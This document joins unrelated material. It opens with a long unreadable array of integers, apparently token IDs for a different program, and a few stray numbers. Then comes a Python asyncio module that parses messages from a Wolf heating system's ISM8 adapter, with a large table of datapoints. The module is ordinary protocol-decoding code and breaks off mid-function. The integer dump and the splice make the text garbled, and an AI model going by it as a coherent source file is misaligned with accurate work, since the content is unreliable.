220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
19815,
721,
1298,
366,
39,
13,
18897,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
24051,
62,
19815,
721,
1298,
366,
32,
2246,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
10394,
1298,
14062,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
17015,
1298,
17729,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
14535,
62,
4873,
1298,
678,
30072,
198,
198,
14259,
18,
796,
1100,
7,
14259,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
3672,
1298,
366,
53,
2079,
3132,
1600,
366,
25695,
62,
312,
1298,
366,
53,
298,
2271,
20662,
8,
198,
85,
18,
62,
16,
796,
1100,
7,
85,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
3672,
1298,
366,
53,
2079,
3132,
12,
486,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
9688,
1298,
366,
9804,
12,
1065,
12,
1065,
51,
405,
25,
405,
25,
940,
57,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
32257,
62,
17805,
271,
1298,
4153,
1635,
3126,
1635,
8576,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
43167,
62,
12303,
312,
1298,
3691,
18,
14692,
12303,
312,
8973,
30072,
198,
37020,
18,
62,
16,
62,
16,
796,
1100,
7,
37020,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
9900,
1298,
366,
4023,
1378,
2503,
13,
2022,
2743,
13,
2398,
14,
21943,
14,
5657,
14,
53,
2079,
3132,
62,
1264,
8784,
21777,
51,
2388,
940,
57,
13,
76,
709,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
12303,
312,
1298,
410,
18,
62,
16,
14692,
12303,
312,
33116,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
34924,
1298,
366,
15588,
14,
24209,
2435,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
19815,
721,
1298,
366,
2964,
4965,
25112,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
24051,
62,
19815,
721,
1298,
366,
32,
2246,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
10394,
1298,
14062,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
17015,
1298,
17729,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
14535,
62,
4873,
1298,
7863,
13,
5607,
30072,
198,
37020,
18,
62,
16,
62,
17,
796,
1100,
7,
37020,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
9900,
1298,
366,
4023,
1378,
2503,
13,
2022,
2743,
13,
2398,
14,
21943,
14,
5657,
14,
53,
2079,
3132,
62,
1264,
8784,
21777,
51,
2388,
940,
57,
13,
3149,
19,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
12303,
312,
1298,
410,
18,
62,
16,
14692,
12303,
312,
33116,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
34924,
1298,
366,
15588,
14,
3149,
19,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
19815,
721,
1298,
366,
39,
13,
18897,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
24051,
62,
19815,
721,
1298,
366,
32,
2246,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
10394,
1298,
14062,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
17015,
1298,
17729,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
14535,
62,
4873,
1298,
1542,
30072,
198,
37020,
18,
62,
16,
62,
18,
796,
1100,
7,
37020,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
9900,
1298,
366,
4023,
1378,
2503,
13,
2022,
2743,
13,
2398,
14,
21943,
14,
5657,
14,
53,
2079,
3132,
62,
1264,
8784,
21777,
51,
2388,
940,
57,
62,
13602,
411,
13,
3149,
19,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
12303,
312,
1298,
410,
18,
62,
16,
14692,
12303,
312,
33116,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
34924,
1298,
366,
15588,
14,
3149,
19,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
19815,
721,
1298,
366,
39,
13,
18897,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
24051,
62,
19815,
721,
1298,
366,
32,
2246,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
10394,
1298,
26250,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
17015,
1298,
33759,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
14535,
62,
4873,
1298,
678,
30072,
198,
198,
4798,
7203,
6329,
24047,
360,
931,
20368,
19351,
12,
4943,
198,
9945,
62,
39455,
796,
33918,
13,
46030,
7,
8897,
3558,
13,
1136,
7,
85,
62,
6371,
737,
5239,
8,
198,
4798,
7,
17752,
13,
67,
8142,
7,
9945,
62,
39455,
11,
3297,
62,
13083,
28,
17821,
11,
33793,
28,
17,
11,
2880,
2024,
16193,
3256,
3256,
705,
25,
705,
22305
] | 1.692788 | 4,007 |
"""
Module for gathering info from Wolf Heating System via ISM8 adapter
"""
import logging
import asyncio
class Ism8(asyncio.Protocol):
"""
This protocol class is invoked to listen to message from ISM8 module and
feed data into internal data array
"""
ISM_HEADER = b'\x06\x20\xf0\x80'
ISM_CONN_HEADER = b'\x04\x00\x00\x00'
ISM_ACK = b'\xF0\x86\x00\x00\x00\x00\x00'
ISM_POLL = b'\x06\x20\xF0\x80\x00\x16\x04\x00\x00\x00\xF0\xD0'
# constant byte arrays for creating ISM8 network messages
DP_DEVICE = 0
# index of Wolf ISM main device name
DP_NAME = 1
# index of datapoint name
DP_TYPE = 2
# index of datapoint type (as described in Wolf API)
DP_RW = 3
# index of R/W-flag (writing not implemented so far)
DP_UNIT = 4
# index of unit description, if applicable
DATAPOINTS = {
1: ('HG1', 'Stoerung', 'DPT_Switch', False, ''),
2: ('HG1', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
3: ('HG1', 'Brennerleistung', 'DPT_Scaling', False, '%'),
4: ('HG1', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
5: ('HG1', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
6: ('HG1', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
7: ('HG1', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
8: ('HG1', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
9: ('HG1', 'Status Brenner', 'DPT_Switch', False, ''),
10: ('HG1', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
11: ('HG1', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
12: ('HG1', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
13: ('HG1', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
14: ('HG2', 'Stoerung', 'DPT_Switch', False, ''),
15: ('HG2', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
16: ('HG2', 'Brennerleistung', 'DPT_Scaling', False, '%'),
17: ('HG2', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
18: ('HG2', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
19: ('HG2', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
20: ('HG2', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
21: ('HG2', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
22: ('HG2', 'Status Brenner', 'DPT_Switch', False, ''),
23: ('HG2', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
24: ('HG2', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
25: ('HG2', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
26: ('HG2', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
27: ('HG3', 'Stoerung', 'DPT_Switch', False, ''),
28: ('HG3', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
29: ('HG3', 'Brennerleistung', 'DPT_Scaling', False, '%'),
30: ('HG3', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
31: ('HG3', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
32: ('HG3', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
33: ('HG3', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
34: ('HG3', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
35: ('HG3', 'Status Brenner', 'DPT_Switch', False, ''),
36: ('HG3', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
37: ('HG3', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
38: ('HG3', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
39: ('HG3', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
40: ('HG4', 'Stoerung', 'DPT_Switch', False, ''),
41: ('HG4', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
42: ('HG4', 'Brennerleistung', 'DPT_Scaling', False, '%'),
43: ('HG4', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
44: ('HG4', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
45: ('HG4', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
46: ('HG4', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
47: ('HG4', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
48: ('HG4', 'Status Brenner', 'DPT_Switch', False, ''),
49: ('HG4', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
50: ('HG4', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
51: ('HG4', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
52: ('HG4', 'Anlagendruck', 'DPT_Value_Pres', False, 'a'),
53: ('BM1', 'Stoerung', 'DPT_Switch', False, ''),
54: ('BM1', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
55: ('BM1', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
56: ('BM1', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
57: ('BM1', 'Programmwahl Heizkreis', 'DPT_HVACMode', True, ''),
58: ('BM1', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
59: ('BM1', 'Heizkreis Zeitprogramm 1', 'DPT_Switch', True, ''),
60: ('BM1', 'Heizkreis Zeitprogramm 2', 'DPT_Switch', True, ''),
61: ('BM1', 'Heizkreis Zeitprogramm 3', 'DPT_Switch', True, ''),
62: ('BM1', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
63: ('BM1', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
64: ('BM1', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
65: ('BM1', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
66: ('BM1', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
67: ('BM2', 'Stoerung', 'DPT_Switch', False, ''),
68: ('BM2', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
69: ('BM2', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
70: ('BM2', 'Programmwahl Mischer', 'DPT_HVACMode', True, ''),
71: ('BM2', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
72: ('BM2', 'Mischer Zeitprogramm 1', 'DPT_Switch', True, ''),
73: ('BM2', 'Mischer Zeitprogramm 2', 'DPT_Switch', True, ''),
74: ('BM2', 'Mischer Zeitprogramm 3', 'DPT_Switch', True, ''),
75: ('BM2', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
76: ('BM2', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
77: ('BM2', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
78: ('BM2', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
79: ('BM2', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
80: ('BM3', 'Stoerung', 'DPT_Switch', False, ''),
81: ('BM3', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
82: ('BM3', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
83: ('BM3', 'Programmwahl Mischer', 'DPT_HVACMode', True, ''),
84: ('BM3', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
85: ('BM3', 'Mischer Zeitprogramm 1', 'DPT_Switch', True, ''),
86: ('BM3', 'Mischer Zeitprogramm 2', 'DPT_Switch', True, ''),
87: ('BM3', 'Mischer Zeitprogramm 3', 'DPT_Switch', True, ''),
88: ('BM3', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
89: ('BM3', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
90: ('BM3', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
91: ('BM3', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
92: ('BM3', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
93: ('BM4', 'Stoerung', 'DPT_Switch', False, ''),
94: ('BM4', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
95: ('BM4', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
96: ('BM4', 'Programmwahl Mischer', 'DPT_HVACMode', True, ''),
97: ('BM4', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
98: ('BM4', 'Mischer Zeitprogramm 1', 'DPT_Switch', True, ''),
99: ('BM4', 'Mischer Zeitprogramm 2', 'DPT_Switch', True, ''),
100: ('BM4', 'Mischer Zeitprogramm 3', 'DPT_Switch', True, ''),
101: ('BM4', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
102: ('BM4', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
103: ('BM4', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
104: ('BM4', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
105: ('BM4', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
106: ('KM', 'Stoerung', 'DPT_Switch', False, ''),
107: ('KM', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
108: ('KM', 'Gesamtmodulationsgrad', 'DPT_Scaling', False, '%'),
109: ('KM', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
110: ('KM', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
111: ('KM', 'Status Ausgang A1', 'DPT_Enable', False, ''),
112: ('KM', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
113: ('KM', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
114: ('MM1', 'Stoerung', 'DPT_Switch', False, ''),
115: ('MM1', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
116: (
'MM1', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
117: ('MM1', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
118: ('MM1', 'Status Ausgang A1', 'DPT_Enable', False, ''),
119: ('MM1', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
120: ('MM1', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
121: ('MM2', 'Stoerung', 'DPT_Switch', False, ''),
122: ('MM2', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
123: (
'MM2', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
124: ('MM2', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
125: ('MM2', 'Status Ausgang A1', 'DPT_Enable', False, ''),
126: ('MM2', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
127: ('MM2', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
128: ('MM3', 'Stoerung', 'DPT_Switch', False, ''),
129: ('MM3', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
130: (
'MM3', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
131: ('MM3', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
132: ('MM3', 'Status Ausgang A1', 'DPT_Enable', False, ''),
133: ('MM3', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
134: ('MM3', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
135: ('SM', 'Stoerung', 'DPT_Switch', False, ''),
136: ('SM', 'Warmwassertemperatur Solar 1', 'DPT_Value_Temp', False,
'C'),
137: ('SM', 'Temperatur Kollektor 1', 'DPT_Value_Temp', False, 'C'),
138: ('SM', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
139: ('SM', 'Eingang E2 (Durchfluss)', 'DPT_Value_Volume_Flow', False,
'l/h'),
140: ('SM', 'Eingang E3', 'DPT_Value_Temp', False, 'C'),
141: ('SM', 'Status Solarkreispumpe SKP1', 'DPT_Switch', False, ''),
142: ('SM', 'Status Ausgang A1', 'DPT_Enable', False, ''),
143: ('SM', 'Status Ausgang A2', 'DPT_Enable', False, ''),
144: ('SM', 'Status Ausgang A3', 'DPT_Enable', False, ''),
145: ('SM', 'Status Ausgang A4', 'DPT_Enable', False, ''),
146: ('SM', 'Durchfluss', 'DPT_Value_Volume_Flow', False, 'l/h'),
147: ('SM', 'aktuelle Leistung', 'DPT_Power', False, 'kW'),
148: ('CWL', 'Stoerung', 'DPT_Switch', False, ''),
149: ('CWL', 'Programm', 'DPT_DHWMode', True, ''),
150: ('CWL', 'Zeitprogramm 1', 'DPT_Switch', True, ''),
151: ('CWL', 'Zeitprogramm 2', 'DPT_Switch', True, ''),
152: ('CWL', 'Zeitprogramm 3', 'DPT_Switch', True, ''),
153: ('CWL', 'Intensivlueftung AN_AUS', 'DPT_Switch', True, ''),
154: ('CWL', 'Intensivlueftung Startdatum', 'DPT_Date', True, ''),
155: ('CWL', 'Intensivlueftung Enddatum', 'DPT_Date', True, ''),
156: ('CWL', 'Intensivlueftung Startzeit', 'DPT_TimeOfDay', True, ''),
157: ('CWL', 'Intensivlueftung Endzeit', 'DPT_TimeOfDay', True, ''),
158: ('CWL', 'Zeitw. Feuchteschutz AN_AUS', 'DPT_Switch', True, ''),
159: ('CWL', 'Zeitw. Feuchteschutz Startdatum', 'DPT_Date', True, ''),
160: ('CWL', 'Zeitw. Feuchteschutz Enddatum', 'DPT_Date', True, ''),
161: (
'CWL', 'Zeitw. Feuchteschutz Startzeit', 'DPT_TimeOfDay', True,
''),
162: (
'CWL', 'Zeitw. Feuchteschutz Endzeit', 'DPT_TimeOfDay', True, ''),
163: ('CWL', 'Lueftungsstufe', 'DPT_Scaling', False, '%'),
164: ('CWL', 'Ablufttemperatur', 'DPT_Value_Temp', False, 'C'),
165: ('CWL', 'Frischlufttemperatur', 'DPT_Value_Temp', False, 'C'),
166: ('CWL', 'Durchsatz Zuluft', 'DPT_FlowRate_m3/h', False, 'ccm/h'),
167: ('CWL', 'Durchsatz Abluft', 'DPT_FlowRate_m3/h', False, 'ccm/h'),
168: ('CWL', 'Bypass Initialisierung', 'DPT_Bool', False, ''),
169: ('CWL', 'Bypass oeffnet_offen', 'DPT_Bool', False, ''),
170: ('CWL', 'Bypass schliesst_geschlossen', 'DPT_Bool', False, ''),
171: ('CWL', 'Bypass Fehler', 'DPT_Bool', False, ''),
172: ('CWL', 'Frost Status: Init_Warte', 'DPT_Bool', False, ''),
173: ('CWL', 'Frost Status: Kein Frost', 'DPT_Bool', False, ''),
174: ('CWL', 'Frost Status: Vorwaermer', 'DPT_Bool', False, ''),
175: ('CWL', 'Frost Status: Fehler', 'DPT_Bool', False, ''),
176: ('BWL', 'Stoerung', 'DPT_Switch', False, ''),
177: ('BWL', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
178: ('BWL', 'Heizleistung', 'DPT_Power', False, 'W'),
179: ('BWL', 'Kuehlleistung', 'DPT_Power', False, 'W'),
180: ('BWL', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
181: ('BWL', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
182: ('BWL', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
183: ('BWL', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
184: ('BWL', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
185: ('BWL', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
186: ('BWL', 'Status Aux-Pumpe', 'DPT_Switch', False, ''),
187: ('BWL', '3W-Umschaltventil HZ_WW', 'DPT_OpenClose', False, ''),
188: ('BWL', '3W-Umschaltventil HZ_K', 'DPT_OpenClose', False, ''),
189: ('BWL', 'Status E-Heizung', 'DPT_Switch', False, ''),
190: ('BWL', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
191: ('BWL', 'Leistungsaufnahme', 'DPT_Power', False, 'W'),
192: ('CWL', 'Filterwarnung aktiv', 'DPT_Switch', False, '-'),
193: ('CWL', 'Filterwarnung zuruecksetzen', 'DPT_Switch', True, '-'),
194: ('BM1', '1x Warmwasserladung (gobal)', 'DPT_Switch', True, '-'),
195: ('SM', 'Tagesertrag', 'DPT_ActiveEnergy', False, 'Wh'),
196: ('SM', 'Gesamtertrag', 'DPT_ActiveEnergy_kWh', False, 'kWh'),
197: ('HG1', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
198: ('HG1', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
199: ('HG1', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
200: ('HG2', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
201: ('HG2', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
202: ('HG2', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
203: ('HG3', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
204: ('HG3', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
205: ('HG3', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
206: ('HG4', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
207: ('HG4', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
208: ('HG4', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
209: ('KM', 'Gesamtmodulationsgradvorgabe', 'DPT_Scaling', True, '%'),
210: ('KM', 'Sammlertemperaturvorgabe', 'DPT_Value_Temp', True, 'C')
}
@staticmethod
def get_device(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_DEVICE]
else:
return None
@staticmethod
def get_name(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_NAME]
else:
return None
@staticmethod
def get_type(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_TYPE]
else:
return None
@staticmethod
def get_unit(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_UNIT]
else:
return None
@staticmethod
def get_all_sensors():
""" returns pointer all possible values of ISM8 datapoints """
return Ism8.DATAPOINTS
def factory(self):
"""
returns reference to itself for using in protocol_factory with
create_server
"""
return self
def connection_made(self, transport):
""" is called as soon as an ISM8 connects to server """
_peername = transport.get_extra_info('peername')
self._LOGGER.info("Connection from ISM8: %s", _peername)
self._transport = transport
self._connected = True
def data_received(self, data):
""" is called whenever data is ready """
_header_ptr = 0
msg_length = 0
self._LOGGER.debug('Raw data received: %s', data)
while _header_ptr < len(data):
_header_ptr = data.find(Ism8.ISM_HEADER, _header_ptr)
if _header_ptr >= 0:
if len(data[_header_ptr:]) >= 9:
# smallest processable data:
# hdr plus 5 bytes=>at least 9 bytes
msg_length = 256 * data[_header_ptr + 4] + data[
_header_ptr + 5]
# msg_length comes in bytes 4 and 5
else:
msg_length = len(data) + 1
# 2 possible outcomes here: Buffer is to short for message=>abort
# buffer is larger => than msg: process 1 message,
# then continue loop
if len(data) < _header_ptr + msg_length:
self._LOGGER.debug(
"Buffer shorter than expected / broken Message.")
self._LOGGER.debug("Discarding: %s ", data[_header_ptr:])
# setting Ptr to end of data will end loop
_header_ptr = len(data)
else:
# send ACK to ISM8 according to API: ISM Header,
# then msg-length(17), then ACK w/ 2 bytes from original msg
ack_msg = bytearray(Ism8.ISM_HEADER)
ack_msg.append(0x00)
ack_msg.append(0x11)
ack_msg.extend(Ism8.ISM_CONN_HEADER)
ack_msg.extend(Ism8.ISM_ACK)
ack_msg[12] = data[_header_ptr + 12]
ack_msg[13] = data[_header_ptr + 13]
self._LOGGER.debug('Sending ACK: %s ', ack_msg)
self._transport.write(ack_msg)
self.process_msg(
data[_header_ptr + 10:_header_ptr + msg_length])
# process message without header (first 10 bytes)
_header_ptr += msg_length
# prepare to get next message; advance Ptr to next Msg
def process_msg(self, msg):
"""
Processes received datagram(s) according to ISM8 API specification
into message length, command, values delivered
"""
max_dp = msg[4] * 256 + msg[5]
# number of DATAPOINTS are coded into bytes 4 and 5 of message
i = 0
# byte counter
dp_nbr = 1
# datapoint counter
while dp_nbr <= max_dp:
self._LOGGER.debug('DP {0:d} / {1:d} in datagram:'.format(
dp_nbr, max_dp))
dp_id = msg[i + 6] * 256 + msg[i + 7]
# dp_command = msg[i + 8]
# to be implemented for writing values to ISM8
dp_length = msg[i + 9]
dp_raw_value = bytearray(msg[i + 10:i + 10 + dp_length])
self._LOGGER.debug('Processing DP-ID %s, %s bytes: message: %s',
dp_id, dp_length, dp_raw_value)
self.decode_datapoint(dp_id, dp_length, dp_raw_value)
# now advance byte counter and datapoint counter
dp_nbr += 1
i = i + 10 + dp_length
def decode_datapoint(self, dp_id, length, raw_bytes):
"""
decodes a single value according to API;
receives raw bytes from network and
decodes them according to API data type
"""
result = 0
for single_byte in raw_bytes:
result = result * 256 + int(single_byte)
if dp_id not in Ism8.DATAPOINTS:
self._LOGGER.error("unknown datapoint: %s, data:%s",
dp_id, result)
return
dp_type = Ism8.DATAPOINTS[dp_id][Ism8.DP_TYPE]
if (length == 1) and dp_type in ("DPT_Switch",
"DPT_Bool",
"DPT_Enable",
"DPT_OpenClose"):
# take 1st bit and cast to Bool
self._dp_values.update({dp_id: bool(result & 1)})
elif (length == 1) and (dp_type == "DPT_HVACMode"):
# translate values to clear status-text
if result == 0:
self._dp_values.update({dp_id: 'Auto'})
elif result == 1:
self._dp_values.update({dp_id: 'Comfort'})
elif result == 2:
self._dp_values.update({dp_id: 'Standby'})
elif result == 3:
self._dp_values.update({dp_id: 'Economy'})
elif result == 4:
